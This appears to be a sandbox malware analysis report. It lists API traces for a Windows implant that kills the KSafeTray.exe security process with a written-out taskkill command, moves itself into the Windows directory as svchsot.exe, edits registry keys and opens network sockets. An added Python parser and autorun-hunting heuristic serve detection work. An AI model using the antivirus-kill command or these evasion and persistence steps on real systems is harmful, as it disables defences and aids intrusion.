                        • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,74DF23A0,?,?), ref: 1000DAFC
                          • Part of subcall function 1000DEAF: RegCloseKey.ADVAPI32(?,1000DC46), ref: 1000DEB9
                          • Part of subcall function 1000DEAF: RegCloseKey.ADVAPI32(?), ref: 1000DEC2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close$Open
                        • String ID: %-25s %-15s $%-25s %-15s %s $%-25s %-15s 0x%x(%d) $REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_SZ$[%s]
                        • API String ID: 2976201327-1612119606
                        • Opcode ID: 784b1dfb547a5b680fc36541a97a8e74263672866ed32129d1f0efc6ee47d703
                        • Instruction ID: 988e6ef60f00e3f2e152d7f8a5758fb594adea5d3f66d130459924d3efa5168c
                        • Opcode Fuzzy Hash: 784b1dfb547a5b680fc36541a97a8e74263672866ed32129d1f0efc6ee47d703
                        • Instruction Fuzzy Hash: 92C174B19006599FEB14DF94CC84FEEB3B9EB88300F508599F619A7180D7B4AE45CFA4
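The enumerator above opens a key with KEY_READ (0x20019), walks it with RegEnumKeyExA/RegEnumValueA and renders each value with the format strings in its string table: "[%s]" for a key header, "%-25s %-15s %s " for string types, "%-25s %-15s 0x%x(%d) " for REG_DWORD and "%-25s %-15s " when there is nothing printable. The following is an added example, not the report's or the implant's code: a Python parser for that fixed-column listing, plus a small hunting heuristic over the parsed result. It assumes newline-separated lines and that REG_BINARY values are printed with the type column only; the value names and paths in the constructed sample are placeholders, while the Run and CentralProcessor key paths are ones this report's string tables list.

```python
"""Parse the registry listing an implant builds with the format strings
"[%s]", "%-25s %-15s %s ", "%-25s %-15s 0x%x(%d) " and "%-25s %-15s ".

Added example, not part of the report or the malware. Line separator and the
data-less rendering of REG_BINARY are assumptions; the sample listing is
constructed here with the same format strings so the parser round-trips it.
"""
import re

REG_TYPES = ("REG_SZ", "REG_EXPAND_SZ", "REG_MULTI_SZ", "REG_DWORD", "REG_BINARY")

def format_value(name, rtype, value=None):
    """Render one value line exactly as the three wsprintfA formats would."""
    if rtype == "REG_DWORD":
        return "%-25s %-15s 0x%x(%d) " % (name, rtype, value, value)
    if rtype in ("REG_SZ", "REG_EXPAND_SZ", "REG_MULTI_SZ"):
        return "%-25s %-15s %s " % (name, rtype, value)
    return "%-25s %-15s " % (name, rtype)   # REG_BINARY and unknown: no data

# Constructed sample. Value names, data and "dropdir" are placeholders.
RUN_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
CPU_KEY = r"HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0"
SAMPLE_LISTING = "\n".join([
    "[%s]" % RUN_KEY,
    format_value("svchsot", "REG_SZ", r"C:\Windows\dropdir\svchsot.exe"),
    format_value("A value name wider than the column", "REG_DWORD", 4660),
    format_value("Blob", "REG_BINARY"),
    "[%s]" % CPU_KEY,
    format_value("~MHz", "REG_DWORD", 2400),
])

_KEY = re.compile(r"^\[(.+)\]$")
# The type token is located by name, not by column offset: a name longer than
# 25 characters overflows its column and shifts everything after it.
_VALUE = re.compile(r"^(?P<name>.*?)\s+(?P<type>%s)(?:\s+(?P<data>.*))?$"
                    % "|".join(REG_TYPES))
_DWORD = re.compile(r"^0x([0-9a-fA-F]+)\((\d+)\)$")

def parse_reg_listing(text):
    """Return {key_path: [(name, type, value), ...]} in listing order.
    REG_DWORD becomes an int (hex and decimal renderings must agree),
    REG_BINARY becomes None, string types stay str."""
    result, current = {}, None
    for raw in text.splitlines():
        line = raw.rstrip()            # the formats leave a trailing space
        if not line:
            continue
        key = _KEY.match(line)
        if key:
            current = key.group(1)
            result.setdefault(current, [])
            continue
        if current is None:
            raise ValueError("value line before any [key] header: %r" % line)
        m = _VALUE.match(line)
        if not m:
            raise ValueError("unparseable value line: %r" % line)
        name, rtype, data = m.group("name"), m.group("type"), m.group("data")
        if rtype == "REG_DWORD":
            d = _DWORD.match(data or "")
            if not d or int(d.group(1), 16) != int(d.group(2)):
                raise ValueError("inconsistent REG_DWORD rendering: %r" % line)
            value = int(d.group(2))
        elif rtype == "REG_BINARY":
            value = None
        else:
            value = data or ""
        result[current].append((name, rtype, value))
    return result

def windows_dir_autoruns(parsed):
    """Heuristic: Run-key values whose data points into a subdirectory of the
    Windows directory other than System32, which is where this dropper places
    svchsot.exe. Returns [(key, name, data), ...]."""
    hits = []
    for key, values in parsed.items():
        if not key.lower().endswith(r"\currentversion\run"):
            continue
        for name, rtype, value in values:
            p = value.lower() if isinstance(value, str) else ""
            if p.startswith("c:\\windows\\") and not p.startswith("c:\\windows\\system32\\"):
                hits.append((key, name, value))
    return hits

if __name__ == "__main__":
    parsed = parse_reg_listing(SAMPLE_LISTING)
    for key, values in parsed.items():
        print("[%s]" % key)
        for name, rtype, value in values:
            print("  %-35s %-14s %r" % (name, rtype, value))
    print("suspicious autoruns:", windows_dir_autoruns(parsed))
```

Because the implant prints REG_DWORD twice (hex and decimal), the parser treats a disagreement between the two as corruption and refuses the line rather than guessing; REG_MULTI_SZ is rendered with a single "%s", so only the first string of a multi-string value survives the listing and the parser cannot recover the rest.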

                        Control-flow Graph

                        APIs
                        • CreateThread.KERNEL32(00000000,00000000,10002410,00000000,00000000,00000000), ref: 10002CDF
                        • CloseHandle.KERNEL32(00000000), ref: 10002CE8
                          • Part of subcall function 100098B0: ??2@YAPAXI@Z.MSVCRT(00000400,?,74DF0F10,74DF2EE0,10002CFA,?,SSSSSS), ref: 100098B8
                          • Part of subcall function 100098B0: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 100098D9
                          • Part of subcall function 100098B0: LoadResource.KERNEL32(?,00000000), ref: 100098E1
                          • Part of subcall function 100098B0: LockResource.KERNEL32(00000000), ref: 100098E8
                          • Part of subcall function 100098B0: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009914
                        • CreateThread.KERNEL32(00000000,00000000,10002940,00000000,00000000,00000000), ref: 10002D27
                        • CloseHandle.KERNEL32(00000000), ref: 10002D2A
                        • Sleep.KERNEL32(000001F4), ref: 10002D31
                        • WinExec.KERNEL32(taskkill /f /im KSafeTray.exe,00000000), ref: 10002D4B
                        • CreateThread.KERNEL32(00000000,00000000,10002A50,00000000,00000000,00000000), ref: 10002D60
                        • CloseHandle.KERNEL32(00000000), ref: 10002D63
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10002DA4
                        • GetWindowsDirectoryA.KERNEL32(?,00000100), ref: 10002DB4
                        • lstrcat.KERNEL32(?,1007A0CC), ref: 10002DCA
                        • lstrcat.KERNEL32(?,00000000), ref: 10002DE6
                        • lstrcat.KERNEL32(?,.exe), ref: 10002DF2
                        • MoveFileA.KERNEL32(?,?), ref: 10002E01
                        • CreateThread.KERNEL32(00000000,00000000,10001A20,00000000,00000000,00000000), ref: 10002E28
                        • CloseHandle.KERNEL32(00000000), ref: 10002E2B
                        • Sleep.KERNEL32(0002BF20), ref: 10002E32
                          • Part of subcall function 100127B0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,74DF0F10,74DF0F00,74DF2EE0,10002D11,Rstray.exe), ref: 100127B8
                          • Part of subcall function 100127B0: ??2@YAPAXI@Z.MSVCRT(00000128,00000002,00000000,?,74DF0F10,74DF0F00,74DF2EE0,10002D11,Rstray.exe), ref: 100127C4
                          • Part of subcall function 100127B0: Process32First.KERNEL32(00000000,00000000), ref: 100127D6
                          • Part of subcall function 100127B0: _strcmpi.MSVCRT ref: 100127E8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Create$CloseHandleThread$Resourcelstrcat$??2@FileSleep$??3@DirectoryExecFindFirstLoadLockModuleMoveNameProcess32SnapshotToolhelp32Windows_strcmpi
                        • String ID: .exe$KSafeTray.exe$LLLLLL$Rstray.exe$SSSSSS$XXXXXX$taskkill /f /im KSafeTray.exe
                        • API String ID: 1427586252-36606792
                        • Opcode ID: 812567550e308246eef1a1741e9c931954995edc5146c82ee3eb478f6b6d6b2d
                        • Instruction ID: ea7c81a8c8d3156fde3d92fde552d30d142569185acdeaf4be769f6522439739
                        • Opcode Fuzzy Hash: 812567550e308246eef1a1741e9c931954995edc5146c82ee3eb478f6b6d6b2d
                        • Instruction Fuzzy Hash: 4E31C1B168034577F620EBA0CC86FDB329CDB85B85F104814F740AA0D5DBF8F98486AA

                        Control-flow Graph

                        APIs
                          • Part of subcall function 100098B0: ??2@YAPAXI@Z.MSVCRT(00000400,?,74DF0F10,74DF2EE0,10002CFA,?,SSSSSS), ref: 100098B8
                          • Part of subcall function 100098B0: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 100098D9
                          • Part of subcall function 100098B0: LoadResource.KERNEL32(?,00000000), ref: 100098E1
                          • Part of subcall function 100098B0: LockResource.KERNEL32(00000000), ref: 100098E8
                          • Part of subcall function 100098B0: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009914
                        • wsprintfA.USER32 ref: 100013C0
                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100013EC
                        • CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,?,?,?,?,-00000006), ref: 10001467
                        • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,-00000006), ref: 1000148B
                        • CloseHandle.KERNEL32(00000000,?,?,?,?,-00000006), ref: 10001492
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Resource$File$??2@??3@CloseCreateDirectoryFindHandleLoadLockSystemWritewsprintf
                        • String ID: GGGGGG$XXXXXX
                        • API String ID: 3303837233-960986945
                        • Opcode ID: 62d36b4c3a9717adabf70673e7b9da5624529c8d21c7069b05e041ff93643327
                        • Instruction ID: 04aaa10fcd26f9137dd4082bdad661446cf6c3c5eea2093c6f49501549e79182
                        • Opcode Fuzzy Hash: 62d36b4c3a9717adabf70673e7b9da5624529c8d21c7069b05e041ff93643327
                        • Instruction Fuzzy Hash: 4431E4726002046BE318CAB4CC56BEB369AEBC9360F144B2DF667972C0DEA49D088291

                        Control-flow Graph (graph image not reproduced; executed/not-executed block colouring lost)
                        • Basic blocks 1000df30-1000e09a; calls: RegCreateKeyExA, RegOpenKeyExA, RegSetValueExA, RegDeleteKeyA, RegDeleteValueA, call 1000e09b
                        APIs
                        • RegCreateKeyExA.KERNEL32(?,00000001,00000000,00000000,00000000,000F003F,00000000,75BF8400,75BF8400,75BF8400,74DE8A60,00000000,?,00000000,00000001,?), ref: 1000DF87
                        • RegOpenKeyExA.KERNEL32(0002001F,00000000,00000000,0002001F,?), ref: 1000DFA7
                        • RegSetValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 1000DFDD
                        • RegSetValueExA.KERNEL32(?,00000000,00000000,?,?), ref: 1000E00A
                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,0002001F,?), ref: 1000E028
                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 1000E03A
                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,0002001F,?), ref: 1000E058
                        • RegDeleteValueA.ADVAPI32(?,?), ref: 1000E06A
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: OpenValue$Delete$Create
                        • String ID:
                        • API String ID: 2295199933-0
                        • Opcode ID: db3b2b67166d1bb11bde5bceef6296bb7a822e4b3c236aec2521ab1580a2075a
                        • Instruction ID: 1b9f00cf2018ec585052cc404c00dab844629f3f5ae0e70b8896e327a927e23a
                        • Opcode Fuzzy Hash: db3b2b67166d1bb11bde5bceef6296bb7a822e4b3c236aec2521ab1580a2075a
                        • Instruction Fuzzy Hash: D6411DB1A04289EBEB10CF95CD84EAF77BDFB48790B108618FA15E3144D7B5ED418B61

                        Control-flow Graph

                        APIs
                          • Part of subcall function 10003FC0: setsockopt.WS2_32(?,0000FFFF,00000080,00000000), ref: 10003FEA
                          • Part of subcall function 10003FC0: CancelIo.KERNEL32(?), ref: 10003FF7
                          • Part of subcall function 10003FC0: InterlockedExchange.KERNEL32(?,00000000), ref: 10004006
                          • Part of subcall function 10003FC0: closesocket.WS2_32(?), ref: 10004013
                          • Part of subcall function 10003FC0: SetEvent.KERNEL32(?), ref: 10004020
                        • ResetEvent.KERNEL32(?,74DF23A0,00000000,?,?,?,?,?,10002764,?,?), ref: 10003B63
                        • socket.WS2_32 ref: 10003B76
                        • gethostbyname.WS2_32(?), ref: 10003B96
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Event$CancelExchangeInterlockedResetclosesocketgethostbynamesetsockoptsocket
                        • String ID:
                        • API String ID: 513860241-0
                        • Opcode ID: 4d899b3987969ecd4fd1a86c1a1ea7a7306cfc35f12dbd9e192bfe98e165e6e5
                        • Instruction ID: 1df40d65a7e954c865ba851cc9ca147fa345c901a36a43ec443bb06f7c0b526b
                        • Opcode Fuzzy Hash: 4d899b3987969ecd4fd1a86c1a1ea7a7306cfc35f12dbd9e192bfe98e165e6e5
                        • Instruction Fuzzy Hash: 3B31C171200351BFE320DF68CC85F9BBBE9BF85754F00891DF2999A280DBB1A4488762

                        Control-flow Graph

                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,74DF0F10,74DF0F00,74DF2EE0,10002D11,Rstray.exe), ref: 100127B8
                        • ??2@YAPAXI@Z.MSVCRT(00000128,00000002,00000000,?,74DF0F10,74DF0F00,74DF2EE0,10002D11,Rstray.exe), ref: 100127C4
                        • Process32First.KERNEL32(00000000,00000000), ref: 100127D6
                        • _strcmpi.MSVCRT ref: 100127E8
                        • Process32Next.KERNEL32(00000000,00000000), ref: 100127FF
                        • lstrcmpiA.KERNEL32(00000024,?), ref: 1001280A
                        • Process32Next.KERNEL32(00000000,00000000), ref: 10012816
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$Next$??2@CreateFirstSnapshotToolhelp32_strcmpilstrcmpi
                        • String ID:
                        • API String ID: 3655294272-0
                        • Opcode ID: 3acb92f7a082f0560a38fcce033ec22d4c764fcd9f584452c6633fb095ea1df2
                        • Instruction ID: f554131ab95697ded66182dc9c6194b9f7e78a4009f5edafd1c660a05443097e
                        • Opcode Fuzzy Hash: 3acb92f7a082f0560a38fcce033ec22d4c764fcd9f584452c6633fb095ea1df2
                        • Instruction Fuzzy Hash: 10F0F4B13013122BE710967AAD49AA77BCDCF82BE6F014434FA04CE082FA31F8608271

                        Control-flow Graph (graph image not reproduced; executed/not-executed block colouring lost)
                        • Basic blocks 100012e0-10001370; calls: wsprintfA, call 1000da90, lstrlen, gethostname
                        APIs
                        • wsprintfA.USER32 ref: 1000132A
                          • Part of subcall function 1000DA90: RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,74DF23A0,?,?), ref: 1000DAFC
                        • lstrlen.KERNEL32(?), ref: 10001356
                        • gethostname.WS2_32(?,?), ref: 1000135E
                        • lstrlen.KERNEL32(?), ref: 10001365
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrlen$Opengethostnamewsprintf
                        • String ID: Host$SYSTEM\CurrentControlSet\Services\%s
                        • API String ID: 2381335061-3973614608
                        • Opcode ID: aa4ad73e3e86f048d8088258d518df793537927515d1099ef6d77d1d5a92305d
                        • Instruction ID: 36a66368fb66d0f392133d3de8f6d52269f6d0892d670254c430f542133935b3
                        • Opcode Fuzzy Hash: aa4ad73e3e86f048d8088258d518df793537927515d1099ef6d77d1d5a92305d
                        • Instruction Fuzzy Hash: E401A7712003547FF7249624CC55FEB739EEFC8754F408829F74593240D6B56D4586A6

                        Control-flow Graph (graph image not reproduced; executed/not-executed block colouring lost)
                        • Single basic block 10003990-10003a64; calls: call 100035e0 (four times), WSAStartup, CreateEventA
                        APIs
                          • Part of subcall function 100035E0: RtlInitializeCriticalSection.NTDLL(?), ref: 100035F8
                        • WSAStartup.WS2_32(00000202,?), ref: 100039FD
                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 10003A0B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateCriticalEventInitializeSectionStartup
                        • String ID: 0$G$h$s
                        • API String ID: 1327880603-311548548
                        • Opcode ID: 14440d884872b4a7e93842e89cfad952c210232e49c4a394018a1025bab9c086
                        • Instruction ID: 34ec8cc1a49c1281e17a861c633ccf758028df7d95d732c7f969fdaadcc4b56f
                        • Opcode Fuzzy Hash: 14440d884872b4a7e93842e89cfad952c210232e49c4a394018a1025bab9c086
                        • Instruction Fuzzy Hash: 6021AF34108BC0DEE325CB28C905B87BBD8AF96704F04891DE4EE476D1D7B9A509CB63
                        APIs
                        • RegOpenKeyA.ADVAPI32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000004), ref: 1000125F
                        • RegQueryValueExA.KERNEL32(?,~MHz,00000000,?,?,?,?,?,?,?,00000000,74DF0F00,00000000), ref: 10001280
                        • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,74DF0F00,00000000), ref: 1000128B
                        Strings
                        • HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 10001255
                        • ~MHz, xrefs: 1000127A
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: CloseOpenQueryValue
                        • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$~MHz
                        • API String ID: 3677997916-2226868861
                        APIs
                        • setsockopt.WS2_32(?,0000FFFF,00000080,00000000), ref: 10003FEA
                        • CancelIo.KERNEL32(?), ref: 10003FF7
                        • InterlockedExchange.KERNEL32(?,00000000), ref: 10004006
                        • closesocket.WS2_32(?), ref: 10004013
                        • SetEvent.KERNEL32(?), ref: 10004020
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                        • String ID:
                        • API String ID: 1486965892-0
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: _ftolceil
                        • String ID:
                        • API String ID: 2006273141-0
                        APIs
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000002,00000001,00000006,?,?,?,?,?,10002764,?), ref: 10012854
                        • _beginthreadex.MSVCRT ref: 1001287C
                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1001288E
                        • CloseHandle.KERNEL32(?), ref: 10012899
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: CloseCreateEventHandleObjectSingleWait_beginthreadex
                        • String ID:
                        • API String ID: 92035984-0
                        APIs
                        • GetInputState.USER32 ref: 100028E3
                        • GetCurrentThreadId.KERNEL32 ref: 100028EF
                        • PostThreadMessageA.USER32(00000000), ref: 100028F6
                        • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 10002907
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: MessageThread$CurrentInputPostState
                        • String ID:
                        • API String ID: 2517755969-0
                        APIs
                        • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 100FA617
                        • VirtualProtect.KERNEL32(?,?,-0000002C,-00000524,?,-0000002C,00000000,-00000524), ref: 100FA786
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: Virtual$FreeProtect
                        • String ID:
                        • API String ID: 2581862158-0
                        APIs
                        • send.WS2_32(?,00000005,?,00000000), ref: 100041F1
                        • Sleep.KERNEL32(0000000A), ref: 1000421E
                        • send.WS2_32(?,00000005,00000000,00000000), ref: 1000423B
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: send$Sleep
                        • String ID:
                        • API String ID: 3329562092-0
                        APIs
                        • VirtualFree.KERNEL32(?,?,00004000,00000000,E9C11475,?,00000000,00000000,?,004010EB), ref: 00401217
                        • VirtualProtect.KERNEL32(?,?,00000000,004010EB,00000000,E9C11475,?,00000000,00000000,?,004010EB), ref: 00401264
                        Memory Dump Source
                        • Source File: 00000000.00000002.4082612578.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4082597077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082631431.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082647752.0000000000407000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082671358.000000000042E000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082688873.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082705565.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: Virtual$FreeProtect
                        • String ID:
                        • API String ID: 2581862158-0
                        APIs
                        • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 10003CDE
                        • recv.WS2_32(?,?,00002000,00000000), ref: 10003D12
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: recvselect
                        • String ID:
                        • API String ID: 741273618-0
                        APIs
                        • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,100FA084,EntryPoint), ref: 100FA580
                        • ExitProcess.KERNEL32(00000000), ref: 100FA8FB
                        Memory Dump Source
